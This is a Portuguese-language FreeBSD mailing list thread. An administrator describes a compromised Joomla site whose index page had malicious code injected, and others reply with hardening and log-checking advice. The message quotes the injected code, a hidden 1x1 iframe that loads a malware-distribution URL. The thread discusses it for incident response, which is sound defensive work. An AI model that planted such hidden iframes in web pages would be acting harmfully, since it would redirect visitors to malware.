[FUG-BR] [off-topic] Index modificado
Eduardo Schoedler
eschoedler em viavale.com.br
Quarta Janeiro 14 10:37:34 BRST 2009
Olá Marcello!
Já tive um problema parecido... imaginei que tivesse sido esse o problema
(permissão), troquei e parou.
Como simular o problema?
Como fazer upload via http (sem ser via formulário html) de um arquivo em um
diretório do apache em que o usuário do processo (www) tenha direitos de
gravação ?
Abraço,
Eduardo.
--------------------------------------------------
From: "Marcello" <unixmafia em yahoo.com.br>
Sent: Tuesday, January 13, 2009 3:27 PM
To: "Lista Brasileira deDiscussãosobre FreeBSD (FUG-BR)"
<freebsd em fug.com.br>
Subject: Re: [FUG-BR] [off-topic] Index modificado
> O causa mais provavel devem ser o dono do arquivo e permissão de
> gravação , o log do apache pode te fornecer algumas dicas de quando isso
> ocorreu.
>
> Verifique se dono do arquivo for www:www , deixe root:www, mas o melhor
> seria um grupo joomla ou um usuario qualquer diferente do apache.
>
> Colocar a pasta publica do apache em uma partição montada com noexec e
> nosuid é um excelente modo de evitar supresas.
>
> Agora isso é furo da aplicação , do joomla que permitiu o uso de algum
> script .
>
> Abraços
>
> Em Ter, 2009-01-13 às 14:21 -0400, Siclal Oliveira escreveu:
>> Olá lista
>>
>> Esta é minha primeira participação na lista.
>> Já trabalho há algum tempo com Freebsd, de forma que espero poder
>> contribuir de alguma forma.
>>
>> Bem, estou com um problema em um dos servidores que administro:
>> O servidor roda Freebsd 7.0 release Amd64, com as últimas versões do
>> php e do mysql atualizados.
>> Ocorre que o meu cliente usa Joomla e algumas das funções exigiram que
>> eu desabilitasse o safe mode do php.
>> A atualização do Joomla ficaria por conta dele, mas para a minha
>> surpresa, atualmente está utilizando a versão 1.0.15, quando a mais
>> atualizada seria a 1.5.9.
>> Fui chamado porque ao abrir a página era startado um direcionamento a
>> uma página com vírus.
>> Verificando o index, percebi que havia sido inserido um código
>> malicioso não última linha:
>>
>> <html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola8"
>> width=1
>> height=1 style="visibility: hidden"></iframe></body></html>
>>
>> Eu imagino que a insersão deva ter ocorrido a partir de alguma falha
>> do joomla, mas gostaria de saber como proceder com os logs a fim de
>> identificar este incidente.
>> Como eu poderia saber se o meu servidor foi afetado gravemente.
>>
>> Desde já agradeço.
>>
>> Abraços a todos.
>>
>> Siclal
>> -------------------------
>> Histórico: http://www.fug.com.br/historico/html/freebsd/
>> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
> -------------------------
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Mais detalhes sobre a lista de discussão freebsd